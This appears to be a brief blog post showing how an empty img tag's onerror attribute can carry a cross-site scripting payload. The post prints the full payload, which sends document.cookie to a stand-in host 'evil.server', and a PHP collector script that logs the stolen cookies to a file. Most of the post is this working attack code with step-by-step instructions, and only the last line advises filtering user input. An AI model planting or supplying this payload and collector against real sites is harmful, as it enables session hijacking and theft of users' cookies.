So much of my time is spent worrying over the src or href tags on images and links – that I sometimes forget about the other attributes.
Imagine being able to make an image which has no black-flagged content in the src but yet can still make a remote request, logging the user’s cookie information? Thats right – this can be done – using the ‘onerror’ attribute of an image.
What you need to do is to create an image link that is obviously broken or empty. Then, javascript handles such events by throwing an error for that element. Add an item to the onerror attribute to request a remote URL as your images src – which you add on document.cookie. The remote script logs all requests, and then displays an image.
Check out the code below:
Source page without proper filtering:
1 2 3 4 5 6 7 | <html> <body> <h1>test</h1> <h2>asdf</h2> <img src="" onerror="this.src='http://evil.server/exploit.php?'+document.cookie" /> </body> </html> |
Then, on evil.server, place your image. Finally, top it off with the following code in exploit.php
1 2 3 4 5 6 7 8 | <?php $image_path = 'test.jpg'; header('Accept-Ranges: bytes'); header('Content-Length: ' . filesize($image_path)); header('Keep-Alive: timeout=15, max=2469'); echo file_get_contents($image_path); file_put_contents("cookieLog.txt", $_SERVER['REQUEST_URI']); ?> |
Easy as that. Just another reminder to properly filter your use submitted content.